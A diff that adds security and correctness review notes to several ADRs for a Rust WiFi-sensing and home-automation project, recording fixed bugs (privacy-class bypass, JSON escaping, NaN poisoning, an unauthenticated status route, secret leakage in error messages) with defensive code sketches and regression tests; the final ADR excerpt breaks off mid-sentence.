**Trust contribution:** the *policy spine* -- privacy posture is a tamper-evident, auditable chain rather than a checkbox; an operator's mode choice actively governs whether identity data may even exist.

---

## Privacy Monotonicity Review (2026-06-14) — confirmed clean

A beyond-SOTA security review of the governed-trust cycle
(`wifi-densepose-engine::StreamingEngine::process_cycle_calibrated`) examined
the privacy-demotion path this ADR governs. **The monotonicity invariant holds:
demotion only ever makes the emitted class more restrictive, never less.**

Verification (no behaviour change, the result is a clean bill with evidence):

- Each cycle computes `effective_class` fresh from the active mode's
  `target_class()` (the floor) and applies at most a **single-step** demotion
  (`demote_one`, clamped at `Restricted`). There is no cross-cycle state that
  could let a permissive class overwrite a restrictive one.
- A forced contradiction (calibration mismatch / array-geometry insufficiency /
  mesh partition risk, ADR-032) raises the class byte; a clean cycle emits
  exactly the base class.
- Pinned by `forced_contradiction_never_relaxes_class`, a property test over
  **all five** `PrivacyMode`s asserting `effective_class.as_u8() >=
  base_class.as_u8()` (strictly greater unless already clamped at `Restricted`)
  under a forced contradiction, and `== base` on a clean cycle.
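
The monotonicity property can be sketched over the class byte alone. The enum below is an assumption: the variant values 1 to 3 match those quoted elsewhere in this review (`Derived`(1), `Anonymous`(2), `Restricted`(3)), `Raw = 0` is inferred, and the `PrivacyMode` to base-class mapping is left out, so this is not the pinned property test itself.

```rust
/// Privacy classes ordered from least to most restrictive
/// (Raw = 0 is an assumed value).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(u8)]
enum PrivacyClass {
    Raw = 0,
    Derived = 1,
    Anonymous = 2,
    Restricted = 3,
}

impl PrivacyClass {
    fn as_u8(self) -> u8 {
        self as u8
    }

    /// Single-step demotion toward the more restrictive side,
    /// clamped at `Restricted`.
    fn demote_one(self) -> Self {
        match self {
            PrivacyClass::Raw => PrivacyClass::Derived,
            PrivacyClass::Derived => PrivacyClass::Anonymous,
            PrivacyClass::Anonymous | PrivacyClass::Restricted => PrivacyClass::Restricted,
        }
    }
}

/// Computed fresh each cycle from the base class: no state is carried
/// over, so a permissive class cannot overwrite a restrictive one.
fn effective_class(base: PrivacyClass, contradiction: bool) -> PrivacyClass {
    if contradiction {
        base.demote_one()
    } else {
        base
    }
}
```

Because `effective_class` is a pure function of the base class and the contradiction flag, the invariant `effective >= base` can be checked exhaustively over all variants.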

Fail-closed boundaries were also pinned: an empty cycle errors (no degenerate
over-permissive output, `empty_cycle_fails_closed`) and the single-node boundary
is characterized as a valid non-demoting mode (`single_node_cycle_is_well_formed`).

The related witness domain-separation fix from the same review is recorded in
ADR-137 (the witness folds `effective_class`, so the demotion is auditable).

## Security & Privacy Review (2026-06-14)

Beyond-SOTA privacy+security review of `wifi-densepose-bfld` (the crate was not in the ADR-154–159 sweep). Two real bugs fixed (each pinned by a fails-on-old test), several dimensions confirmed clean.

### Findings

| # | Severity | Site | Issue | Fix | Pinned by |
|---|----------|------|-------|-----|-----------|
| 1 | **privacy-bypass (HIGH)** | `pipeline.rs::process_to_frame` | The documented wire-bytes production path stamped the frame header with the active `PrivacyClass` but serialized the caller's `BfldPayload` **unchanged** via `BfldFrame::from_payload` — never routing through `PrivacyGate::demote`. A frame labeled `Anonymous`(2)/`Restricted`(3) carried the full `compressed_angle_matrix` (identity surface) + amplitude/phase + `csi_delta`. A `NetworkSink` accepts class ≥ `Derived`(1), so the identity surface could cross the node boundary despite the restrictive class byte — the byte lied about content. | Apply `PrivacyGate::demote(frame, active_class)` after construction: a same-class transition that strips the sections the class forbids; `Raw`/`Derived` keep the full payload. | `tests/pipeline_to_frame.rs::process_to_frame_at_anonymous_strips_identity_leaky_sections`, `…_in_privacy_mode_strips_amplitude_and_phase` (both FAILED pre-fix); `…_at_derived_preserves_full_payload` (over-strip guard) |
| 2 | **PII/injection (MEDIUM)** | `mqtt_topics.rs::render_events` | `zone_activity` payload built as `format!("\"{zone}\"")` with no JSON escaping (while `ha_discovery.rs` already escapes). A zone name with `"`/`\` produced malformed/injectable JSON on the HA state topic. | `json_string_literal()` escaper mirroring `ha_discovery::push_str_field`. Value-identical for normal zone names. | `tests/mqtt_topic_routing.rs::zone_payload_escapes_json_metacharacters` (FAILED pre-fix) |
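
Finding 2 in the table above comes down to escaping a string before embedding it in a JSON payload. A minimal sketch follows, assuming the function takes a `&str` and returns the quoted literal; the name `json_string_literal` is from the table, while the exact set of escapes the crate emits is not stated, so the one below follows the general JSON string rules.

```rust
/// Renders `s` as a quoted JSON string literal, escaping quotes,
/// backslashes, and control characters.
fn json_string_literal(s: &str) -> String {
    let mut out = String::with_capacity(s.len() + 2);
    out.push('"');
    for ch in s.chars() {
        match ch {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            // Remaining control characters use the \u00XX form.
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out.push('"');
    out
}
```

For ordinary zone names the output equals the old `format!("\"{zone}\"")` result, which is why the fix is value-identical in the common case.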
|
||||
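Finding 2 comes down to quoting a zone name without escaping it. The sketch below shows what such an escaper could look like; the function body is an assumption written for illustration (only the name `json_string_literal` comes from the table above), and the real implementation in `mqtt_topics.rs` may differ.

```rust
/// Illustrative escaper (assumed body): renders `s` as a quoted JSON string
/// literal, escaping the quote, the backslash, and ASCII control characters.
fn json_string_literal(s: &str) -> String {
    let mut out = String::with_capacity(s.len() + 2);
    out.push('"');
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            // Remaining control characters use the \uXXXX form.
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out.push('"');
    out
}
```

For a zone name with no metacharacters the output equals the old `format!("\"{zone}\"")` result, which is what "value-identical for normal zone names" means in the table.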
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
- **Event-field privacy gating** — `BfldEvent::apply_privacy_gating` nulls `identity_risk_score` + `rf_signature_hash` at `Restricted`, and `serde(skip_serializing_if = "Option::is_none")` omits them entirely. `render_events`/`render_discovery_payloads` refuse class < `Anonymous` (stricter than the `sink.rs` `NetworkKind` `MIN_CLASS = Derived` — defense in depth toward less leakage). Covered by `event_privacy_gating.rs`, `mqtt_topic_routing.rs`, `ha_discovery.rs`.
|
||||
- **Witness/hash framing (the engine `witness_of` bug class)** — CLEAN. `SignatureHasher::compute` prefixes a **fixed 4-byte** `day_epoch` then a **fixed-width canonical-f32** feature block (`IdentityFeatures`: Embedding = `EMBEDDING_DIM*4`, RiskFactors = 16 B). `PrivacyAttestationProof::compute` hashes a fixed 32-byte `prev_hash` + three fixed 1-byte values. No variable-length operator-influenceable string is concatenated into any digest — no length-prefix-framing collision is possible.
|
||||
- **Fail-closed** — `payload.rs::from_bytes` rejects truncated/overflowing/trailing-byte sections (`checked_add`, bounds checks); `frame.rs::from_bytes` validates magic/version/length/CRC; `PrivacyClass::try_from` rejects unknown bytes; `identity_risk::score` maps NaN/degenerate factors → 0.0 (privacy-conservative). The `from_score(NaN) → Accept` choice is a documented, deliberate publish-aggregate-only fallback (NaN never reaches it from `score()`); risk-driven NaN cannot leak identity because identity gating is class-byte-driven, not risk-driven.
|
||||
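The framing point in the witness/hash bullet can be made concrete. The following is a minimal sketch, not code from the crate: both helper functions are hypothetical, and it only demonstrates why concatenating variable-length fields without framing lets two different inputs produce the same pre-image, while fixed-width or length-prefixed fields do not.

```rust
/// Hypothetical helper: joins fields with no framing at all.
fn concat_unframed(parts: &[&[u8]]) -> Vec<u8> {
    parts.concat()
}

/// Hypothetical helper: prefixes every field with its length as a
/// fixed-width little-endian u64, so field boundaries are unambiguous.
fn concat_framed(parts: &[&[u8]]) -> Vec<u8> {
    let mut out = Vec::new();
    for p in parts {
        out.extend_from_slice(&(p.len() as u64).to_le_bytes());
        out.extend_from_slice(p);
    }
    out
}
```

With the fields `("ab", "c")` and `("a", "bc")`, the unframed byte strings are identical and the framed ones differ. A digest built only from fixed-width fields, as described above, sidesteps the problem without needing a length prefix.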
|
||||
### Observation (not a bug)
|
||||
|
||||
The ADR-141 control plane (`PrivacyMode`/`PrivacyModeRegistry`) is **not yet wired into the emit path** — the emitter/pipeline enforce the raw `PrivacyClass` directly; the registry is exported + unit-tested but advisory. This matches the "Integration glue — not yet on the live path" status above. The class-byte enforcement (emitter + event + renderers + the now-fixed `process_to_frame`) is the live guarantee. Wiring the registry is the documented next step.
|
||||
|
||||
@@ -253,6 +253,54 @@ Validation per CLAUDE.md: `cargo test --workspace --no-default-features` green;
|
||||
|
||||
---
|
||||
|
||||
## 6. Review notes
|
||||
|
||||
### 6.1 Correctness + security review (2026-06-14)
|
||||
|
||||
Beyond-SOTA correctness+security review of `wifi-densepose-calibration` (this
|
||||
ADR's pipeline), which the ADR-154–159 sweep did not cover.
|
||||
|
||||
**Finding (FIXED) — NaN-poisoning of the feature path (numerical / fail-closed).**
|
||||
`Features::from_series` — the carrier for both live inference and training-anchor
|
||||
extraction — computed `mean`/`variance`/`motion` over the raw scalar series with
|
||||
no non-finite guard. A single `NaN`/`±inf` sample (corrupt CSI frame) yielded
|
||||
`mean=NaN, variance=NaN` and an all-`NaN` prototype embedding. Persisted into a
|
||||
`PresenceSpecialist::threshold`/`empty_mean` at train time, the `NaN` **silently
|
||||
disabled presence detection** for the bank's lifetime (every `>` / `|·|`
|
||||
comparison against `NaN` is false → always reads *absent*, confidence 0), with no
|
||||
error — and an asymmetry against the rigorously NaN-guarded `geometry_embedding`.
|
||||
Fixed at the production boundary: non-finite samples are dropped (a corrupt frame
|
||||
counts as no frame), an all-non-finite series degrades to `Features::ZERO` like
|
||||
the empty series. Value-identical for all-finite input (full-loop + extract tests
|
||||
unchanged); pinned by `non_finite_samples_do_not_poison_features` and
|
||||
`all_non_finite_series_is_zero` (both fail on the old code).
|
||||
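The boundary fix described above can be sketched as follows. This is an illustration under stated assumptions, not the crate's code: the `Features` struct here carries only `mean` and `variance` (the real one also has `motion`), and the population-variance formula is assumed.

```rust
/// Simplified stand-in for the crate's feature struct (assumed fields).
#[derive(Debug, Clone, Copy, PartialEq)]
struct Features {
    mean: f32,
    variance: f32,
}

impl Features {
    const ZERO: Features = Features { mean: 0.0, variance: 0.0 };

    /// Drops non-finite samples before any arithmetic, so a corrupt frame
    /// counts as no frame; an empty or all-non-finite series yields ZERO.
    fn from_series(series: &[f32]) -> Features {
        let finite: Vec<f32> = series.iter().copied().filter(|x| x.is_finite()).collect();
        if finite.is_empty() {
            return Features::ZERO;
        }
        let n = finite.len() as f32;
        let mean = finite.iter().sum::<f32>() / n;
        let variance = finite.iter().map(|x| (x - mean).powi(2)).sum::<f32>() / n;
        Features { mean, variance }
    }
}
```

Because the filter runs before the sums, an all-finite series takes exactly the same arithmetic path as before, which is the value-identical property the existing tests rely on.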
|
||||
**Clean dimensions (evidence, no invented issues).**
|
||||
- *File/path handling:* the crate performs **zero** file/path I/O (no
|
||||
`std::fs`/`Path`/`File`/`read`/`write` in `src/`; only in-memory `serde_json`).
|
||||
Path-traversal / unbounded-read / artifact-path handling live entirely in the
|
||||
`wifi-densepose-cli` consumer (`room.rs`), outside this crate's boundary.
|
||||
- *Untrusted-load:* `SpecialistBank::from_json` shape-validates via serde
|
||||
(malformed → `CalibrationError::Serde`); banks are local-first (invariant B),
|
||||
never network-received. A well-formed bank with adversarial numerics is trusted
|
||||
as-is — acceptable under the local-first threat model; a validate-on-load
|
||||
defense-in-depth pass is a possible future hardening, not a present bug.
|
||||
- *Receipt/hash integrity:* the crate emits no hash/receipt/witness/signature, so
|
||||
the unframed-concatenation bug class (cf. the engine `witness_of` fix) is
|
||||
structurally absent.
|
||||
- *Other numerical paths:* `geometry_embedding` sanitizes every input and sweeps
|
||||
to finite; presence/restlessness/anomaly divisions are `.max(1e-3)`-guarded;
|
||||
`autocorr_dominant` guards `r0`, short signals, and empty bands; `train` rejects
|
||||
empty anchors; anomaly requires ≥2 anchors.
|
||||
|
||||
De-magicked the bare specialist threshold literals (breathing/heartbeat default
|
||||
min-scores, anomaly outlier-spread multiple + label cutoff) into named documented
|
||||
consts, value-identical, pinned by const-equality tests. Tests
|
||||
**58→62 unit + 1 integration, 0 failed**; Python deterministic proof unchanged
|
||||
(off the signal proof path).
|
||||
|
||||
---
|
||||
|
||||
## 5. Summary
|
||||
|
||||
> Big models understand the world. Small ruVector models understand *your room*.
|
||||
|
||||
@@ -231,6 +231,8 @@ Catalogued so nothing is silently dropped. Priority: **P1** correctness-adjacent
|
||||
|
||||
> **Horizon-ledger one-liner.** Milestone-0 DONE: dead CIR gate (FIXED+proved), NaN/inf adversarial bypass (FIXED+proved), divide-by-(n−1) window trio (FIXED+proved), calibration dead-branch (FIXED), PSD FFT-planner cache (MEASURED), DTW band (MEASURED). **Milestone-1 DONE (2026-06-13): all four P1 backlog items cleared — circular phase variance #1 (RESOLVED/MEASURED metric, DATA-GATED threshold), Welford n=0 guard #10 (RESOLVED/MEASURED), threshold magic-constants #9 & #13 (RESOLVED-PARTIAL/DATA-GATED — de-magicked + boundary-tested, values unchanged).** **Milestone-2 DONE (2026-06-13): bench-first P2 perf subset + missing boundary tests cleared — spectrogram per-subcarrier FFT re-plan #20 (MEASURED-HOT, 1.40–1.84×, bit-identical); attention/tomography/Kalman #5/#6/#7 (MEASURED-NULL — benched, not hot, left as-is); field_model eigendecompose #8 (MEASUREMENT-ONLY, BLAS un-buildable on this Windows host, number deferred to a BLAS box, NOT fabricated); fft_operator tolerance #14, phase-align convergence-cap #16, csi-ratio epsilon #19 (RESOLVED, tests added).** **Milestone-3 DONE (2026-06-13): the lumped §7.4 row #21–45 P3 backlog cleared, and with it residual P3 items #2/#12/#17/#18 — 22 magic constants de-magicked into named EMPIRICAL-DEFAULT consts (each pinned == prior literal) + 6 boundary/characterization tests across 11 modules; ~4 doc-only; not-real findings (unreachable attractor_drift div0, non-existent gesture thresholds, proof-path features.rs) reported + skipped, no churn; no operating value changed; workspace 3,275/0, Python proof bit-exact `f8e76f21…`.** **§7.4 deferred backlog is now FULLY CLEARED across M0–M3 — nothing silently dropped.**
|
||||
|
||||
> **Sibling-crate sweep extension (2026-06-14) — `wifi-densepose-geo` + `wifi-densepose-pointcloud`.** The ADR-154-class numerical-robustness sweep (non-finite-input-poisons-persistent-state + divide-by-zero / asin-domain / degenerate-geometry) was extended to two crates *outside* this ADR's signal scope. **Two real `geo` bugs FIXED, each fails-on-old-pinned:** `terrain.rs::parse_hgt` usize-underflow panic on empty/sub-2x2 SRTM data (`1.0/(side-1)` → panic in debug / inf `cell_size_deg` poisoning `ElevationGrid::get` in release — a truncated download / 404 HTML body reaches it; now `bail!`s when `side < 2`); `coord.rs::haversine` `asin(>1)→NaN` for near-antipodal points (`h` rounds to `1.0+4e-16`; clamped to `[0,1]`). The ±90° pole `cos(lat)=0` ENU singularity is pinned no-panic without changing the transform. **`pointcloud` is confirmed-robust (no manufactured finding):** its only persistent auto-accumulating state (`occupancy` EMA + vitals) is fed solely by the integer-rssi/`sqrt`/`atan2` parser (always finite) and is provably self-healing even under an adversarial NaN/inf `CsiFrame` (`motion_score=(NaN/100).min(1.0)→1.0`; breathing `→0→clamp(5,40)→5.0`) — pinned by `nonfinite_frame_does_not_poison_persistent_state` + degenerate-voxel-fusion no-panic tests. `geo` 9→15 lib / 8 integration; `pointcloud` 18→22; 0 failed; workspace green; Python proof bit-exact `f8e76f21…`. See CHANGELOG `[Unreleased] → Fixed`.
|
||||
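The `haversine` fix mentioned in the note above follows a common pattern: clamp the intermediate term into the domain of `asin` before taking the root. A minimal sketch, assuming a spherical Earth radius constant and a hypothetical function name and signature (the real `coord.rs` API is not shown in this document):

```rust
/// Assumed mean Earth radius in metres (illustrative constant).
const EARTH_RADIUS_M: f64 = 6_371_000.0;

/// Great-circle distance in metres between two points given in degrees.
fn haversine_m(lat1_deg: f64, lon1_deg: f64, lat2_deg: f64, lon2_deg: f64) -> f64 {
    let (lat1, lat2) = (lat1_deg.to_radians(), lat2_deg.to_radians());
    let dlat = lat2 - lat1;
    let dlon = (lon2_deg - lon1_deg).to_radians();
    let h = (dlat / 2.0).sin().powi(2)
        + lat1.cos() * lat2.cos() * (dlon / 2.0).sin().powi(2);
    // Rounding can push h slightly above 1.0 for near-antipodal points;
    // asin of a value above 1.0 is NaN, so clamp into [0, 1] first.
    2.0 * EARTH_RADIUS_M * h.clamp(0.0, 1.0).sqrt().asin()
}
```

The clamp changes nothing for inputs where `h` is already in range, so ordinary distances are unaffected.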
|
||||
---
|
||||
|
||||
## 8. Consequences
|
||||
|
||||
@@ -265,3 +265,74 @@ Result at time of writing (all 0 failed):
|
||||
perform (B5).
|
||||
- Files kept under the 500-line guideline (`engine.rs` 462; behavioral tests
|
||||
moved to `tests/engine_behaviors.rs`).
|
||||
|
||||
## Addendum — `homecore-api` follow-up security review (beyond-SOTA pass)
|
||||
|
||||
A later network-facing review of `homecore-api` (the remote REST + WS attack
|
||||
surface) — independent of the ADR-154–159 sweep — found and fixed two real
|
||||
issues the original M7 pass (which focused on the WS auth bypass HC-WS-01, the
|
||||
reply-theater HC-WS-02, and the bin token provisioning HC-WS-08) did not catch.
|
||||
Both are LOW severity and reported at true severity.
|
||||
|
||||
### HC-API-AUTH-01 — `GET /api/` was unauthenticated (FIXED)
|
||||
|
||||
`rest::api_root` took no headers and unconditionally returned
|
||||
`200 {"message":"API running."}`, while every sibling route gates on
|
||||
`BearerAuth::from_headers`. HA's `APIStatusView` inherits `requires_auth = True`,
|
||||
so `/api/` must return **401** for a missing/wrong bearer. HA clients use the
|
||||
status route as a token-validation probe; a 200 told a bad-token client its
|
||||
token was valid and let an unauthenticated party confirm a live endpoint.
|
||||
LOW severity (the body is a static string; no entity/state data leaks).
|
||||
|
||||
**Fix:** `api_root(headers, State)` now validates the bearer like `get_config`.
|
||||
**Pinned by** (fail-on-old, `tests/server_bin_auth.rs`):
|
||||
`api_root_rejects_missing_bearer`, `api_root_rejects_wrong_bearer` (both 200→401),
|
||||
guarded by `api_root_accepts_correct_bearer` (still 200 with a valid token).
|
||||
|
||||
### HC-WS-LAG-01 — `subscribe_events` killed the stream on a broadcast lag (FIXED)
|
||||
|
||||
The per-subscription task matched `Err(_) => break` on both broadcast
|
||||
`recv()` arms. `RecvError::Lagged(n)` (a slow consumer falling
|
||||
more than `EVENT_CHANNEL_CAPACITY` = 4,096 events behind) is **recoverable**: the bus
|
||||
doc says "Lagged receivers must re-sync" and HA keeps the subscription alive
|
||||
across a lag. The old code treated the first lag as fatal, so after an event
|
||||
burst the client's stream went permanently silent with no error frame — a
|
||||
self-inflicted event-delivery DoS under load.
|
||||
|
||||
**Fix:** `Lagged(_) => continue` (skip the dropped window, re-sync),
|
||||
`Closed => break`, on both the system and domain arms of the `select!`.
|
||||
**Pinned by** `subscription_survives_broadcast_lag` (`tests/ws_handshake.rs`):
|
||||
subscribes to a filtered event type, floods 6,000 unrelated events past the
|
||||
4,096 capacity to force a `Lagged`, then asserts a subsequent subscribed event
|
||||
is still delivered (old code: 5s-timeout panic).
|
||||
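The control-flow change is small enough to model without an async runtime. The sketch below is a std-only stand-in: `RecvError` is a local enum that only mimics the two cases named above, and `drain_subscription` is a hypothetical function that replays a recorded sequence of receive results rather than a real broadcast channel.

```rust
/// Local stand-in for the channel's receive error (assumed shape).
#[derive(Debug)]
enum RecvError {
    Lagged(u64),
    Closed,
}

/// Replays receive results the way the fixed subscription loop treats them:
/// a lag skips the dropped window and keeps going, a close ends the stream.
fn drain_subscription<I>(results: I) -> (Vec<String>, u64)
where
    I: IntoIterator<Item = Result<String, RecvError>>,
{
    let mut delivered = Vec::new();
    let mut skipped = 0u64;
    for r in results {
        match r {
            Ok(event) => delivered.push(event),
            // Recoverable: note how many events were lost, then re-sync.
            Err(RecvError::Lagged(n)) => {
                skipped += n;
                continue;
            }
            // Terminal: the sender side is gone.
            Err(RecvError::Closed) => break,
        }
    }
    (delivered, skipped)
}
```

Under the old `Err(_) => break` behaviour, the same input would stop at the first `Lagged` and never deliver the later event.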
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
- **AuthN/AuthZ** — all 7 other REST handlers gate on `BearerAuth::from_headers`
|
||||
→ `LongLivedTokenStore::is_valid` before any work; the WS handshake validates
|
||||
the `auth` token against the same store before the command loop, and
|
||||
privileged commands are unreachable pre-`auth_ok`. Token compare is
|
||||
`HashSet::contains` (content-independent timing — not the byte-`==` oracle of
|
||||
ADR-157 §B4), so no timing-oracle finding. No route skips the gate; no
|
||||
result-ignored check; no default/empty token accepted.
|
||||
- **Path traversal** — no route maps user input to a filesystem path (state is an
|
||||
in-memory `DashMap`); `:entity_id` passes through `EntityId::parse`, a strict
|
||||
`[a-z0-9_]+\.[a-z0-9_]+` ASCII allowlist that rejects `..`, `/`, `\`, and
|
||||
absolute paths. No traversal surface.
|
||||
- **Injection** — no SQL, no shell/subprocess, no `format!`-into-response;
|
||||
service/state bodies are typed `serde_json::Value` handed to the in-process
|
||||
registry (HA-equivalent).
|
||||
- **Info-leak** — `ApiError` maps to fixed status + a typed `{message}`;
|
||||
`ServiceError::HandlerFailed(String)` is integration-controlled (HA surfaces
|
||||
the handler error too), never framework internals/paths/stack-traces — no
|
||||
ADR-080-class leak.
|
||||
- **CORS** — explicit allowlist with `allow_credentials(false)` (HC-05),
|
||||
not `permissive()`.
|
||||
- **De-magic** — no bare security-relevant literals in the crate worth
|
||||
extracting (`EVENT_CHANNEL_CAPACITY` is already named in `homecore`; CORS
|
||||
dev-default ports are documented).
|
||||
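The path-traversal bullet rests on the entity-id allowlist. A minimal std-only sketch of a validator for the `[a-z0-9_]+\.[a-z0-9_]+` shape is shown below; `is_valid_entity_id` is a hypothetical name, and the real `EntityId::parse` may return a typed error rather than a boolean.

```rust
/// Returns true when `s` is exactly `<domain>.<object>` with both parts
/// non-empty and drawn only from lowercase ASCII letters, digits, and `_`.
fn is_valid_entity_id(s: &str) -> bool {
    fn part_ok(p: &str) -> bool {
        !p.is_empty()
            && p.bytes()
                .all(|b| b.is_ascii_lowercase() || b.is_ascii_digit() || b == b'_')
    }
    match s.split_once('.') {
        // A second dot lands in `object` and fails the character check.
        Some((domain, object)) => part_ok(domain) && part_ok(object),
        None => false,
    }
}
```

Since `/`, `\`, and a bare `..` all fail the character or emptiness checks, nothing that resembles a path survives validation.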
|
||||
**Tests:** `homecore-api --no-default-features` **25 → 29** (+2 api-root auth,
|
||||
+1 api-root accept-guard, +1 WS lag-survival), 0 failed. Workspace green.
|
||||
Python deterministic proof unchanged (homecore-api is off the signal proof
|
||||
path).
|
||||
|
||||
@@ -78,6 +78,23 @@ converts the entity registry; full conversion of the remaining artifacts is defe
|
||||
|
||||
- `MigrateError` carries context (`path`, line/field) for I/O, JSON, YAML, missing-field,
|
||||
unsupported-schema-version, and entity-id parse failures (`src/lib.rs`).
|
||||
- **Secret-leak hardening (security review, 2026-06).** `secrets.yaml` parse failures must
|
||||
NOT use the generic `MigrateError::YamlParse { source }` variant: `serde_yaml`'s message
|
||||
for a typed-tag coercion error (e.g. `port: !!int <value>`) embeds the offending scalar
|
||||
verbatim (`invalid value: string "<the-secret-value>"`), and that error propagates through
|
||||
the `InspectSecrets` CLI path to stderr — leaking a secret value despite the CLI's
|
||||
deliberate `<redacted>` design. `read_secrets` now maps such failures to a dedicated
|
||||
redacting variant `MigrateError::SecretsParse { path, line, column }` that carries only the
|
||||
file path and a coarse location (`serde_yaml::Error::location()`), never the scalar content.
|
||||
Pinned by `secrets::tests::malformed_secrets_error_never_contains_secret_value` (asserts the
|
||||
rendered error **and its full `#[source]` chain** never contain the secret value).
|
||||
**Review dimensions confirmed clean with evidence:** source is never mutated (no
|
||||
`fs::write`/`remove`/`create` anywhere — P1 reads source, writes nothing); paths are
|
||||
user-supplied dirs joined with fixed filenames (no `..`/absolute traversal beyond the
|
||||
user's own privileges); malformed/typed/truncated `.storage` JSON and YAML **error, never
|
||||
panic** (every production `unwrap`/`expect` is test-only); unknown schema `minor_version`
|
||||
hard-errors fail-closed; no SQL/shell/path injection surface (the tool emits diagnostics
|
||||
only, persists nothing in P1).
|
||||
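The redacting-variant idea in the secret-leak bullet can be sketched without the YAML parser. Everything below is illustrative: `RawParseError` is a hypothetical stand-in for a parser error whose message embeds the offending scalar, and `redact` is an assumed helper name. Only the `SecretsParse { path, line, column }` shape comes from the text above.

```rust
use std::fmt;
use std::path::PathBuf;

/// Reduced error enum carrying only the redacting variant.
#[derive(Debug)]
enum MigrateError {
    SecretsParse { path: PathBuf, line: usize, column: usize },
}

impl fmt::Display for MigrateError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            MigrateError::SecretsParse { path, line, column } => write!(
                f,
                "failed to parse {} at line {}, column {} (content redacted)",
                path.display(),
                line,
                column
            ),
        }
    }
}

// No `source()` override: the underlying parser error is not chained.
impl std::error::Error for MigrateError {}

/// Hypothetical parser error whose message may contain a secret value.
struct RawParseError {
    message: String,
    line: usize,
    column: usize,
}

/// Keeps the coarse location and deliberately discards the message.
fn redact(path: PathBuf, raw: RawParseError) -> MigrateError {
    let RawParseError { message, line, column } = raw;
    drop(message); // never stored, never rendered
    MigrateError::SecretsParse { path, line, column }
}
```

The design choice worth noting is that the original error is not attached as a source, so walking the error chain cannot reach the scalar either.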
|
||||
### 2.5 Deferred to P2+ (NOT built — honestly labelled)
|
||||
|
||||
@@ -89,7 +106,9 @@ converts the entity registry; full conversion of the remaining artifacts is defe
|
||||
|
||||
### 2.6 Test evidence (as shipped)
|
||||
|
||||
- 19 tests (`cargo test -p homecore-migrate`), per the crate README badge.
|
||||
- 21 tests (`cargo test -p homecore-migrate`) — 19 as originally shipped plus 2 added by the
|
||||
2026-06 security review (`secrets::tests::malformed_secrets_error_never_contains_secret_value`,
|
||||
`malformed_secrets_error_reports_location`).
|
||||
|
||||
## 3. Consequences
|
||||
|
||||
|
||||
@@ -0,0 +1,117 @@
|
||||
# ADR-172: `wifi-densepose-cli` + `wifi-densepose-core` CSI-Deserialiser Security Review
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Status** | Accepted — clean-with-evidence, 4 regression pins added |
|
||||
| **Date** | 2026-06-15 |
|
||||
| **Deciders** | ruv |
|
||||
| **Codename** | **CSI-DESERIALISER-HARDENING** |
|
||||
| **Supersedes / amends** | none (records review; references ADR-127 §9 for the `core` portion, ADR-136 for the pre-existing DoS ACs) |
|
||||
|
||||
## Context
|
||||
|
||||
The beyond-SOTA security sweep (branch `feat/v2-beyond-sota-sweep`) reviewed each
|
||||
`v2/` crate for real, reproducible defects. Two crates had no prior dedicated
|
||||
security ADR:
|
||||
|
||||
- **`wifi-densepose-core`** — the dependency root for all 12 downstream crates
|
||||
(types, traits, error types, CSI frame primitives). A defect here is a
|
||||
force-multiplier: every consumer inherits it.
|
||||
- **`wifi-densepose-cli`** — the user-facing entrypoint
|
||||
(`calibrate`/`calibrate-serve`/`enroll`/`train-room`/`room-watch` + MAT-gated),
|
||||
which parses untrusted UDP CSI packets and operator-supplied paths.
|
||||
|
||||
A **specific hypothesis** motivated the core review. Three earlier reviews in
|
||||
this campaign found a systemic **NaN-state-poisoning bug class** in crates that
|
||||
depend on core (`wifi-densepose-calibration`, `-vitals`, `-geo`): a non-finite
|
||||
(NaN/Inf) input latched into persistent filter/accumulator state (IIR `y1/y2`,
|
||||
running mean, Welford/von-Mises accumulator, voxel grid) → silent **permanent**
|
||||
feature failure. The load-bearing question for this review: **does that bug class
|
||||
originate in a shared `wifi-densepose-core` primitive** (making the right fix a
|
||||
single root fix), or was it independently re-implemented in each downstream
|
||||
crate (making the three existing local fixes complete)?
|
||||
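To make the bug class concrete, here is a minimal sketch of a second-order recursive filter that refuses to latch a non-finite output into its state. It is a generic illustration, not the downstream crates' code: the struct, the coefficient names, and the difference equation are assumptions chosen for brevity.

```rust
/// Delay-line state of the filter: two past inputs, two past outputs.
#[derive(Debug, Default, Clone, Copy)]
struct IirState {
    x1: f64,
    x2: f64,
    y1: f64,
    y2: f64,
}

/// Illustrative two-pole resonator (assumed form):
/// y[n] = gain * (x[n] - x[n-2]) - a1 * y[n-1] - a2 * y[n-2]
struct Resonator {
    gain: f64,
    a1: f64,
    a2: f64,
    state: IirState,
}

impl Resonator {
    fn new(gain: f64, a1: f64, a2: f64) -> Self {
        Resonator { gain, a1, a2, state: IirState::default() }
    }

    fn step(&mut self, x: f64) -> f64 {
        let s = self.state;
        let y = self.gain * (x - s.x2) - self.a1 * s.y1 - self.a2 * s.y2;
        if !y.is_finite() {
            // Without this branch, NaN would be stored in y1/y2 and every
            // later output would be NaN. Reset instead, so the filter
            // recovers on the next clean sample.
            self.state = IirState::default();
            return 0.0;
        }
        self.state = IirState { x1: x, x2: s.x1, y1: y, y2: s.y1 };
        y
    }
}
```

Because a non-finite input always produces a non-finite output in this form, the state can only ever hold finite values, which is the property the per-crate fixes establish locally.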
|
||||
## Decision
|
||||
|
||||
Record the review outcome and lock in the existing DoS guards with regression
|
||||
tests. **No production code is changed** — both crates were already hardened
|
||||
(ADR-136 acceptance criteria + `sanitize_room_id`); the gap was *untested*
|
||||
guards, which a future refactor could silently remove.
|
||||
|
||||
### Load-bearing question — VERDICT: **NO** (the NaN class does not live in core)
|
||||
|
||||
`wifi-densepose-core` exposes **no stateful accumulator of any kind** — no
|
||||
Welford/running-mean, no von-Mises/circular-mean, no IIR/biquad filter state, no
|
||||
voxel grid.
|
||||
|
||||
- **MEASURED:** `grep` over `core/src` for
|
||||
